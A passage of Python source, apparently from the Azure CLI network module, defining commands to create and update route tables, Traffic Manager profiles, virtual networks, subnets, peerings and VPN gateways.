if cmd.supported_api_version(min_api='2019-08-01'):
prefix.public_ip_address_version = version if version is not None else 'ipv4'
if cmd.supported_api_version(min_api='2020-06-01') and custom_ip_prefix_name:
cip_client = network_client_factory(cmd.cli_ctx).custom_ip_prefixes
try:
prefix.custom_ip_prefix = cip_client.get(resource_group_name, custom_ip_prefix_name)
except ResourceNotFoundError:
raise ResourceNotFoundError('Custom ip prefix {} doesn\'t exist.'.format(custom_ip_prefix_name))
if edge_zone:
prefix.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_prefix_name, prefix)
def update_public_ip_prefix(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region RouteFilters
def create_route_filter(cmd, client, resource_group_name, route_filter_name, location=None, tags=None):
RouteFilter = cmd.get_models('RouteFilter')
return client.begin_create_or_update(resource_group_name, route_filter_name,
RouteFilter(location=location, tags=tags))
def list_route_filters(client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_route_filter_rule(cmd, client, resource_group_name, route_filter_name, rule_name, access, communities,
location=None):
RouteFilterRule = cmd.get_models('RouteFilterRule')
return client.begin_create_or_update(resource_group_name, route_filter_name, rule_name,
RouteFilterRule(access=access, communities=communities,
location=location))
# endregion
# region RouteTables
def create_route_table(cmd, resource_group_name, route_table_name, location=None, tags=None,
disable_bgp_route_propagation=None):
RouteTable = cmd.get_models('RouteTable')
ncf = network_client_factory(cmd.cli_ctx)
route_table = RouteTable(location=location, tags=tags)
if cmd.supported_api_version(min_api='2017-10-01'):
route_table.disable_bgp_route_propagation = disable_bgp_route_propagation
return ncf.route_tables.begin_create_or_update(resource_group_name, route_table_name, route_table)
def update_route_table(instance, tags=None, disable_bgp_route_propagation=None):
if tags == '':
instance.tags = None
elif tags is not None:
instance.tags = tags
if disable_bgp_route_propagation is not None:
instance.disable_bgp_route_propagation = disable_bgp_route_propagation
return instance
def create_route(cmd, resource_group_name, route_table_name, route_name, next_hop_type, address_prefix,
next_hop_ip_address=None):
Route = cmd.get_models('Route')
route = Route(next_hop_type=next_hop_type, address_prefix=address_prefix,
next_hop_ip_address=next_hop_ip_address, name=route_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.routes.begin_create_or_update(resource_group_name, route_table_name, route_name, route)
def update_route(instance, address_prefix=None, next_hop_type=None, next_hop_ip_address=None):
if address_prefix is not None:
instance.address_prefix = address_prefix
if next_hop_type is not None:
instance.next_hop_type = next_hop_type
if next_hop_ip_address is not None:
instance.next_hop_ip_address = next_hop_ip_address
return instance
# endregion
# region ServiceEndpoints
def create_service_endpoint_policy(cmd, resource_group_name, service_endpoint_policy_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
ServiceEndpointPolicy = cmd.get_models('ServiceEndpointPolicy')
policy = ServiceEndpointPolicy(tags=tags, location=location)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name, policy)
def list_service_endpoint_policies(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def update_service_endpoint_policy(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
def create_service_endpoint_policy_definition(cmd, resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, service, service_resources,
description=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policy_definitions
ServiceEndpointPolicyDefinition = cmd.get_models('ServiceEndpointPolicyDefinition')
policy_def = ServiceEndpointPolicyDefinition(description=description, service=service,
service_resources=service_resources)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, policy_def)
def update_service_endpoint_policy_definition(instance, service=None, service_resources=None, description=None):
if service is not None:
instance.service = service
if service_resources is not None:
instance.service_resources = service_resources
if description is not None:
instance.description = description
return instance
# endregion
# region TrafficManagers
def list_traffic_manager_profiles(cmd, resource_group_name=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
def create_traffic_manager_profile(cmd, traffic_manager_profile_name, resource_group_name,
routing_method, unique_dns_name, monitor_path=None,
monitor_port=80, monitor_protocol=MonitorProtocol.http.value,
profile_status=ProfileStatus.enabled.value,
ttl=30, tags=None, interval=None, timeout=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Profile, DnsConfig, MonitorConfig
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if monitor_path is None and monitor_protocol == 'HTTP':
monitor_path = '/'
profile = Profile(location='global', tags=tags, profile_status=profile_status,
traffic_routing_method=routing_method,
dns_config=DnsConfig(relative_name=unique_dns_name, ttl=ttl),
monitor_config=MonitorConfig(protocol=monitor_protocol,
port=monitor_port,
path=monitor_path,
interval_in_seconds=interval,
timeout_in_seconds=timeout,
tolerated_number_of_failures=max_failures,
custom_headers=monitor_custom_headers,
expected_status_code_ranges=status_code_ranges),
max_return=max_return)
return client.create_or_update(resource_group_name, traffic_manager_profile_name, profile)
def update_traffic_manager_profile(instance, profile_status=None, routing_method=None, tags=None,
monitor_protocol=None, monitor_port=None, monitor_path=None,
ttl=None, timeout=None, interval=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
if tags is not None:
instance.tags = tags
if profile_status is not None:
instance.profile_status = profile_status
if routing_method is not None:
instance.traffic_routing_method = routing_method
if ttl is not None:
instance.dns_config.ttl = ttl
if monitor_protocol is not None:
instance.monitor_config.protocol = monitor_protocol
if monitor_port is not None:
instance.monitor_config.port = monitor_port
if monitor_path == '':
instance.monitor_config.path = None
elif monitor_path is not None:
instance.monitor_config.path = monitor_path
if interval is not None:
instance.monitor_config.interval_in_seconds = interval
if timeout is not None:
instance.monitor_config.timeout_in_seconds = timeout
if max_failures is not None:
instance.monitor_config.tolerated_number_of_failures = max_failures
if monitor_custom_headers is not None:
instance.monitor_config.custom_headers = monitor_custom_headers
if status_code_ranges is not None:
instance.monitor_config.expected_status_code_ranges = status_code_ranges
if max_return is not None:
instance.max_return = max_return
# TODO: Remove workaround after https://github.com/Azure/azure-rest-api-specs/issues/1940 fixed
for endpoint in instance.endpoints:
endpoint._validation = { # pylint: disable=protected-access
'name': {'readonly': False},
'type': {'readonly': False},
}
return instance
def create_traffic_manager_endpoint(cmd, resource_group_name, profile_name, endpoint_type, endpoint_name,
target_resource_id=None, target=None,
endpoint_status=None, weight=None, priority=None,
endpoint_location=None, endpoint_monitor_status=None,
min_child_endpoints=None, geo_mapping=None,
monitor_custom_headers=None, subnets=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Endpoint
ncf = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).endpoints
endpoint = Endpoint(target_resource_id=target_resource_id, target=target,
endpoint_status=endpoint_status, weight=weight, priority=priority,
endpoint_location=endpoint_location,
endpoint_monitor_status=endpoint_monitor_status,
min_child_endpoints=min_child_endpoints,
geo_mapping=geo_mapping,
subnets=subnets,
custom_headers=monitor_custom_headers)
return ncf.create_or_update(resource_group_name, profile_name, endpoint_type, endpoint_name,
endpoint)
def update_traffic_manager_endpoint(instance, endpoint_type=None, endpoint_location=None,
endpoint_status=None, endpoint_monitor_status=None,
priority=None, target=None, target_resource_id=None,
weight=None, min_child_endpoints=None, geo_mapping=None,
subnets=None, monitor_custom_headers=None):
if endpoint_location is not None:
instance.endpoint_location = endpoint_location
if endpoint_status is not None:
instance.endpoint_status = endpoint_status
if endpoint_monitor_status is not None:
instance.endpoint_monitor_status = endpoint_monitor_status
if priority is not None:
instance.priority = priority
if target is not None:
instance.target = target
if target_resource_id is not None:
instance.target_resource_id = target_resource_id
if weight is not None:
instance.weight = weight
if min_child_endpoints is not None:
instance.min_child_endpoints = min_child_endpoints
if geo_mapping is not None:
instance.geo_mapping = geo_mapping
if subnets is not None:
instance.subnets = subnets
if monitor_custom_headers:
instance.custom_headers = monitor_custom_headers
return instance
def list_traffic_manager_endpoints(cmd, resource_group_name, profile_name, endpoint_type=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
profile = client.get(resource_group_name, profile_name)
return [e for e in profile.endpoints if not endpoint_type or e.type.endswith(endpoint_type)]
# endregion
# region VirtualNetworks
# pylint: disable=too-many-locals
def create_vnet(cmd, resource_group_name, vnet_name, vnet_prefixes='10.0.0.0/16',
subnet_name=None, subnet_prefix=None, dns_servers=None,
location=None, tags=None, vm_protection=None, ddos_protection=None, bgp_community=None,
ddos_protection_plan=None, network_security_group=None, edge_zone=None, flowtimeout=None,
enable_encryption=None, encryption_enforcement_policy=None):
AddressSpace, DhcpOptions, Subnet, VirtualNetwork, SubResource, NetworkSecurityGroup = \
cmd.get_models('AddressSpace', 'DhcpOptions', 'Subnet', 'VirtualNetwork',
'SubResource', 'NetworkSecurityGroup')
client = network_client_factory(cmd.cli_ctx).virtual_networks
tags = tags or {}
vnet = VirtualNetwork(
location=location, tags=tags,
dhcp_options=DhcpOptions(dns_servers=dns_servers),
address_space=AddressSpace(address_prefixes=(vnet_prefixes if isinstance(vnet_prefixes, list) else [vnet_prefixes]))) # pylint: disable=line-too-long
if subnet_name:
if cmd.supported_api_version(min_api='2018-08-01'):
vnet.subnets = [Subnet(name=subnet_name,
address_prefix=subnet_prefix[0] if len(subnet_prefix) == 1 else None,
address_prefixes=subnet_prefix if len(subnet_prefix) > 1 else None,
network_security_group=NetworkSecurityGroup(id=network_security_group)
if network_security_group else None)]
else:
vnet.subnets = [Subnet(name=subnet_name, address_prefix=subnet_prefix)]
if cmd.supported_api_version(min_api='2017-09-01'):
vnet.enable_ddos_protection = ddos_protection
vnet.enable_vm_protection = vm_protection
if cmd.supported_api_version(min_api='2018-02-01'):
vnet.ddos_protection_plan = SubResource(id=ddos_protection_plan) if ddos_protection_plan else None
if edge_zone:
vnet.extended_location = _edge_zone_model(cmd, edge_zone)
if flowtimeout is not None:
vnet.flow_timeout_in_minutes = flowtimeout
if bgp_community is not None and cmd.supported_api_version(min_api='2020-06-01'):
VirtualNetworkBgpCommunities = cmd.get_models('VirtualNetworkBgpCommunities')
vnet.bgp_communities = VirtualNetworkBgpCommunities(virtual_network_community=bgp_community)
if enable_encryption is not None:
if not vnet.encryption:
vnet.encryption = {}
vnet.encryption["enabled"] = enable_encryption
if encryption_enforcement_policy is not None:
if not vnet.encryption:
raise ArgumentUsageError('usage error: --encryption--enforcement--policy is only configurable when '
'--enable-encryption is specified.')
vnet.encryption["enforcement"] = encryption_enforcement_policy
return cached_put(cmd, client.begin_create_or_update, vnet, resource_group_name, vnet_name)
def update_vnet(cmd, instance, vnet_prefixes=None, dns_servers=None, ddos_protection=None, vm_protection=None,
ddos_protection_plan=None, flowtimeout=None, bgp_community=None, enable_encryption=None,
encryption_enforcement_policy=None):
# server side validation reports pretty good error message on invalid CIDR,
# so we don't validate at client side
AddressSpace, DhcpOptions, SubResource = cmd.get_models('AddressSpace', 'DhcpOptions', 'SubResource')
if vnet_prefixes and instance.address_space:
instance.address_space.address_prefixes = vnet_prefixes
elif vnet_prefixes:
instance.address_space = AddressSpace(address_prefixes=vnet_prefixes)
if dns_servers == ['']:
instance.dhcp_options.dns_servers = None
elif dns_servers and instance.dhcp_options:
instance.dhcp_options.dns_servers = dns_servers
elif dns_servers:
instance.dhcp_options = DhcpOptions(dns_servers=dns_servers)
if ddos_protection is not None:
instance.enable_ddos_protection = ddos_protection
if vm_protection is not None:
instance.enable_vm_protection = vm_protection
if ddos_protection_plan == '':
instance.ddos_protection_plan = None
elif ddos_protection_plan is not None:
instance.ddos_protection_plan = SubResource(id=ddos_protection_plan)
if flowtimeout is not None:
instance.flow_timeout_in_minutes = flowtimeout
if bgp_community is not None and cmd.supported_api_version(min_api='2020-06-01'):
VirtualNetworkBgpCommunities = cmd.get_models('VirtualNetworkBgpCommunities')
instance.bgp_communities = VirtualNetworkBgpCommunities(virtual_network_community=bgp_community)
if enable_encryption is not None:
if not instance.encryption:
VirtualNetworkEncryption = cmd.get_models('VirtualNetworkEncryption')
instance.encryption = VirtualNetworkEncryption(enabled=enable_encryption)
instance.encryption.enabled = enable_encryption
if encryption_enforcement_policy is not None:
if not instance.encryption:
raise ArgumentUsageError('usage error: --encryption--enforcement--policy is only configurable when '
'--enable-encryption is specified.')
instance.encryption.enforcement = encryption_enforcement_policy
return instance
def _set_route_table(ncf, resource_group_name, route_table, subnet):
if route_table:
is_id = is_valid_resource_id(route_table)
rt = None
if is_id:
res_id = parse_resource_id(route_table)
rt = ncf.route_tables.get(res_id['resource_group'], res_id['name'])
else:
rt = ncf.route_tables.get(resource_group_name, route_table)
subnet.route_table = rt
elif route_table == '':
subnet.route_table = None
def create_subnet(cmd, resource_group_name, virtual_network_name, subnet_name,
address_prefix, network_security_group=None,
route_table=None, service_endpoints=None, service_endpoint_policy=None,
delegations=None, nat_gateway=None,
disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, Subnet, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
if cmd.supported_api_version(min_api='2018-08-01'):
subnet = Subnet(
name=subnet_name,
address_prefixes=address_prefix if len(address_prefix) > 1 else None,
address_prefix=address_prefix[0] if len(address_prefix) == 1 else None
)
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
subnet.nat_gateway = SubResource(id=nat_gateway)
else:
subnet = Subnet(name=subnet_name, address_prefix=address_prefix)
if network_security_group:
subnet.network_security_group = NetworkSecurityGroup(id=network_security_group)
_set_route_table(ncf, resource_group_name, route_table, subnet)
if service_endpoints:
subnet.service_endpoints = []
for service in service_endpoints:
subnet.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy:
subnet.service_endpoint_policies = []
for policy in service_endpoint_policy:
subnet.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
subnet.delegations = delegations
if disable_private_endpoint_network_policies is True:
subnet.private_endpoint_network_policies = "Disabled"
if disable_private_endpoint_network_policies is False:
subnet.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies is True:
subnet.private_link_service_network_policies = "Disabled"
if disable_private_link_service_network_policies is False:
subnet.private_link_service_network_policies = "Enabled"
vnet = cached_get(cmd, ncf.virtual_networks.get, resource_group_name, virtual_network_name)
upsert_to_collection(vnet, 'subnets', subnet, 'name')
vnet = cached_put(
cmd, ncf.virtual_networks.begin_create_or_update, vnet, resource_group_name, virtual_network_name).result()
return get_property(vnet.subnets, subnet_name)
def update_subnet(cmd, instance, resource_group_name, address_prefix=None, network_security_group=None,
route_table=None, service_endpoints=None, delegations=None, nat_gateway=None,
service_endpoint_policy=None, disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'SubResource')
if address_prefix:
if cmd.supported_api_version(min_api='2018-08-01'):
instance.address_prefixes = address_prefix if len(address_prefix) > 1 else None
instance.address_prefix = address_prefix[0] if len(address_prefix) == 1 else None
else:
instance.address_prefix = address_prefix
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
instance.nat_gateway = SubResource(id=nat_gateway)
elif nat_gateway == '':
instance.nat_gateway = None
if network_security_group:
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
elif network_security_group == '': # clear it
instance.network_security_group = None
_set_route_table(network_client_factory(cmd.cli_ctx), resource_group_name, route_table, instance)
if service_endpoints == ['']:
instance.service_endpoints = None
elif service_endpoints:
instance.service_endpoints = []
for service in service_endpoints:
instance.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy == '':
instance.service_endpoint_policies = None
elif service_endpoint_policy:
instance.service_endpoint_policies = []
for policy in service_endpoint_policy:
instance.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
instance.delegations = delegations
if disable_private_endpoint_network_policies:
instance.private_endpoint_network_policies = "Disabled"
elif disable_private_endpoint_network_policies is not None:
instance.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies:
instance.private_link_service_network_policies = "Disabled"
elif disable_private_link_service_network_policies is not None:
instance.private_link_service_network_policies = "Enabled"
return instance
def list_avail_subnet_delegations(cmd, resource_group_name=None, location=None):
client = network_client_factory(cmd.cli_ctx)
if resource_group_name:
return client.available_resource_group_delegations.list(location, resource_group_name)
return client.available_delegations.list(location)
def create_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name,
remote_virtual_network, allow_virtual_network_access=False,
allow_forwarded_traffic=False, allow_gateway_transit=False,
use_remote_gateways=False):
if not is_valid_resource_id(remote_virtual_network):
remote_virtual_network = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=remote_virtual_network
)
SubResource, VirtualNetworkPeering = cmd.get_models('SubResource', 'VirtualNetworkPeering')
peering = VirtualNetworkPeering(
id=resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=virtual_network_name),
name=virtual_network_peering_name,
remote_virtual_network=SubResource(id=remote_virtual_network),
allow_virtual_network_access=allow_virtual_network_access,
allow_gateway_transit=allow_gateway_transit,
allow_forwarded_traffic=allow_forwarded_traffic,
use_remote_gateways=use_remote_gateways)
aux_subscription = parse_resource_id(remote_virtual_network)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def update_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name, **kwargs):
peering = kwargs['parameters']
aux_subscription = parse_resource_id(peering.remote_virtual_network.id)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def list_available_ips(cmd, resource_group_name, virtual_network_name):
client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet = client.get(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name)
start_ip = vnet.address_space.address_prefixes[0].split('/')[0]
available_ips = client.check_ip_address_availability(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
ip_address=start_ip)
return available_ips.available_ip_addresses
# endregion
# region VirtualNetworkGateways
def create_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, public_cert_data, cert_name):
VpnClientRootCertificate = cmd.get_models('VpnClientRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
raise CLIError("Must add address prefixes to gateway '{}' prior to adding a root cert."
.format(gateway_name))
config = gateway.vpn_client_configuration
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
cert = VpnClientRootCertificate(name=cert_name, public_cert_data=public_cert_data)
upsert_to_collection(config, 'vpn_client_root_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_root_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_root_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def create_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, thumbprint, cert_name):
VpnClientRevokedCertificate = cmd.get_models('VpnClientRevokedCertificate')
config, gateway, ncf = _prep_cert_create(cmd, gateway_name, resource_group_name)
cert = VpnClientRevokedCertificate(name=cert_name, thumbprint=thumbprint)
upsert_to_collection(config, 'vpn_client_revoked_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_revoked_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_revoked_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def _prep_cert_create(cmd, gateway_name, resource_group_name):
VpnClientConfiguration = cmd.get_models('VpnClientConfiguration')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
gateway.vpn_client_configuration = VpnClientConfiguration()
config = gateway.vpn_client_configuration
if not config.vpn_client_address_pool or not config.vpn_client_address_pool.address_prefixes:
raise CLIError('Address prefixes must be set on VPN gateways before adding'
' certificates. Please use "update" with --address-prefixes first.')
if config.vpn_client_revoked_certificates is None:
config.vpn_client_revoked_certificates = []
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
return config, gateway, ncf
def create_vnet_gateway(cmd, resource_group_name, virtual_network_gateway_name, public_ip_address,
virtual_network, location=None, tags=None,
no_wait=False, gateway_type=None, sku=None, vpn_type=None, vpn_gateway_generation=None,
asn=None, bgp_peering_address=None, peer_weight=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None, edge_zone=None,
nat_rule=None):
(VirtualNetworkGateway, BgpSettings, SubResource, VirtualNetworkGatewayIPConfiguration, VirtualNetworkGatewaySku,
VpnClientConfiguration, AddressSpace, VpnClientRootCertificate, VirtualNetworkGatewayNatRule,
VpnNatRuleMapping) = cmd.get_models(
'VirtualNetworkGateway', 'BgpSettings', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VirtualNetworkGatewaySku', 'VpnClientConfiguration', 'AddressSpace', 'VpnClientRootCertificate',
'VirtualNetworkGatewayNatRule', 'VpnNatRuleMapping')
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
subnet = virtual_network + '/subnets/GatewaySubnet'
active = len(public_ip_address) == 2
vnet_gateway = VirtualNetworkGateway(
gateway_type=gateway_type, vpn_type=vpn_type, vpn_gateway_generation=vpn_gateway_generation, location=location,
tags=tags, sku=VirtualNetworkGatewaySku(name=sku, tier=sku), active=active, ip_configurations=[],
gateway_default_site=SubResource(id=gateway_default_site) if gateway_default_site else None)
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic',
name='vnetGatewayConfig{}'.format(i)
)
vnet_gateway.ip_configurations.append(ip_configuration)
if asn or bgp_peering_address or peer_weight:
vnet_gateway.enable_bgp = True
vnet_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
if any((address_prefixes, client_protocol)):
vnet_gateway.vpn_client_configuration = VpnClientConfiguration()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
vnet_gateway.vpn_client_configuration.vpn_client_protocols = client_protocol
if any((radius_secret, radius_server)) and cmd.supported_api_version(min_api='2017-06-01'):
vnet_gateway.vpn_client_configuration.radius_server_address = radius_server
vnet_gateway.vpn_client_configuration.radius_server_secret = radius_secret
# multi authentication
if cmd.supported_api_version(min_api='2020-11-01'):
vnet_gateway.vpn_client_configuration.vpn_authentication_types = vpn_auth_type
vnet_gateway.vpn_client_configuration.aad_tenant = aad_tenant
vnet_gateway.vpn_client_configuration.aad_issuer = aad_issuer
vnet_gateway.vpn_client_configuration.aad_audience = aad_audience
vnet_gateway.vpn_client_configuration.vpn_client_root_certificates = [
VpnClientRootCertificate(name=root_cert_name,
public_cert_data=root_cert_data)] if root_cert_data else None
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
vnet_gateway.custom_routes = AddressSpace()
vnet_gateway.custom_routes.address_prefixes = custom_routes
if edge_zone:
vnet_gateway.extended_location = _edge_zone_model(cmd, edge_zone)
if nat_rule:
vnet_gateway.nat_rules = [
VirtualNetworkGatewayNatRule(type_properties_type=rule.get('type'), mode=rule.get('mode'), name=rule.get('name'),
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('internal_mappings')] if rule.get('internal_mappings') else None,
external_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('external_mappings')] if rule.get('external_mappings') else None,
ip_configuration_id=rule.get('ip_config_id')) for rule in nat_rule]
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, virtual_network_gateway_name, vnet_gateway)
def update_vnet_gateway(cmd, instance, sku=None, vpn_type=None, tags=None,
public_ip_address=None, gateway_type=None, enable_bgp=None,
asn=None, bgp_peering_address=None, peer_weight=None, virtual_network=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None):
(AddressSpace, SubResource, VirtualNetworkGatewayIPConfiguration, VpnClientConfiguration,
VpnClientRootCertificate) = cmd.get_models('AddressSpace', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VpnClientConfiguration', 'VpnClientRootCertificate')
if any((address_prefixes, radius_server, radius_secret, client_protocol)) and not instance.vpn_client_configuration:
instance.vpn_client_configuration = VpnClientConfiguration()
if address_prefixes is not None:
if not instance.vpn_client_configuration.vpn_client_address_pool:
instance.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
if not instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes:
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = []
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
with cmd.update_context(instance.vpn_client_configuration) as c:
c.set_param('vpn_client_protocols', client_protocol)
c.set_param('radius_server_address', radius_server)
c.set_param('radius_server_secret', radius_secret)
if cmd.supported_api_version(min_api='2020-11-01'):
c.set_param('aad_tenant', aad_tenant)
c.set_param('aad_audience', aad_audience)
c.set_param('aad_issuer', aad_issuer)
c.set_param('vpn_authentication_types', vpn_auth_type)
if root_cert_data and cmd.supported_api_version(min_api='2020-11-01'):
upsert_to_collection(instance.vpn_client_configuration, 'vpn_client_root_certificates',
VpnClientRootCertificate(name=root_cert_name, public_cert_data=root_cert_data), 'name')
with cmd.update_context(instance.sku) as c:
c.set_param('name', sku)
c.set_param('tier', sku)
with cmd.update_context(instance) as c:
c.set_param('gateway_default_site', SubResource(id=gateway_default_site) if gateway_default_site else None)
c.set_param('vpn_type', vpn_type)
c.set_param('tags', tags)
subnet_id = '{}/subnets/GatewaySubnet'.format(virtual_network) if virtual_network else \
instance.ip_configurations[0].subnet.id
if virtual_network is not None:
for config in instance.ip_configurations:
config.subnet.id = subnet_id
if public_ip_address is not None:
instance.ip_configurations = []
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet_id),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic', name='vnetGatewayConfig{}'.format(i))
instance.ip_configurations.append(ip_configuration)
# Update active-active/active-standby status
active = len(public_ip_address) == 2
if instance.active and not active:
logger.info('Placing gateway in active-standby mode.')
elif not instance.active and active:
logger.info('Placing gateway in active-active mode.')
instance.active = active
if gateway_type is not None:
instance.gateway_type = gateway_type
if enable_bgp is not None:
instance.enable_bgp = enable_bgp.lower() == 'true'
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
if not instance.custom_routes:
instance.custom_routes = AddressSpace()
instance.custom_routes.address_prefixes = custom_routes
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
return instance
def start_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def stop_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def generate_vpn_client(cmd, client, resource_group_name, virtual_network_gateway_name, processor_architecture=None,
authentication_method=None, radius_server_auth_certificate=None, client_root_certificates=None,
use_legacy=False):
params = cmd.get_models('VpnClientParameters')(
processor_architecture=processor_architecture
)
if cmd.supported_api_version(min_api='2017-06-01') and not use_legacy:
params.authentication_method = authentication_method
